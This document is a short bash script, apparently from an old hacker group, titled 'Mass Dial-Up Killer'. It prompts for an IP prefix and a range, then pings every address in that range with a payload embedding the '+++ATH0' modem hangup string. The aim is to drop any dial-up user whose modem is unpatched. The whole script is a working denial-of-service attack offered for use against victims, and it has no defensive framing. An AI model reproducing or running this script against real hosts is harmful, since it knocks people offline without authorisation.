#!/bin/bash
clear
printf "\t\tMass Dial-Up Killer --ver KilleriX(0.1)\n\n\n\a"
#This Script Sends ATZ H0(ath++) to victims
#If the Modem received the ATZ H0(drop command) is not patched,
#The user is beeing Dropped
#It's Possible to dr0p signle user or to give the range of dialups
#to send the dr0p string
#Written by hip0 of pC-fREAK Org. -===www.pcfreak.cc===-
printf "Enter Start Ip Below From Where The Attack Starts\n"
printf "Example xxx.xxx.xxx. Do Not Enter the full ip as xxx.xxx.xxx.xxx!\n\n"
printf "Start IP:"
read startip
printf "Enter Range (example if you want to send ath++ for range 1/255\n"
printf "then enter 255\n\n"
printf "Enter Range:"
read range
clear
printf "\t\tSending Shits...\n"
printf "\t\t****************\n"

some=1
some1=0
while [ "$some1" -lt "$range" ]; do
some1=$(($some + $some1));
ping -c 4 -p 2b2b2b415448300d $startip.$some1
echo
echo "ATZ H0 Sended to $startip.$some1"
echo '---------------------------------'
done
echo -n "Done.."
printf "All Not Patched MOdem in $startip.$range\n range Killed" 

